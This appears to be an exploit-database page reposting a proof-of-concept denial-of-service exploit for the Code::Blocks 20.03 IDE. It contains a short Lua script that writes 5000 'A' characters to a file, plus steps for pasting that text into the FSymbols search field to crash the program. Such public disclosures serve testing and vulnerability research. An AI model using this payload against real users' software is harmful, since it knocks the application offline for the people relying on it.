Advertisement






Code Blocks 20.03 - Denial Of Service (PoC)

CVE Category Price Severity
N/A CWE-772: Missing Release of Resource After Effective Lifetime N/A High
Author Risk Exploitation Type Date
Anonymous High Local 2021-01-04
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010026

Below is a copy:

Code Blocks 20.03 - Denial Of Service (PoC)
-- Title  : Code Blocks 20.03 - Denial Of Service (PoC)
-- Author : Rmulo, @uromulou

-- How to crash?

-- 1 => Run Lua code, down.lua...
-- 2 => Copy content to clipboard...
-- 3 => Open your Code Blocks...
-- 4 => In the "Management" section on left hand side, click on "FSymbols" tab...
-- 5 => Select "Active project's symbols" from drop down "View:" menu...
-- 6 => Paste clipboard into the "Search:" field...
-- 7 => Press ENTER...
-- 8 => Down?

-- Banner

print("Title  : Code Blocks 20.03 - Denial Of Service (PoC)")
print("Author : Rmulo, @uromulou - 04/01/2021")

-- The code

file = io.open("crash.txt", "w")
local payload = string.rep("\x41", 5000)
file:write(payload)
file.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum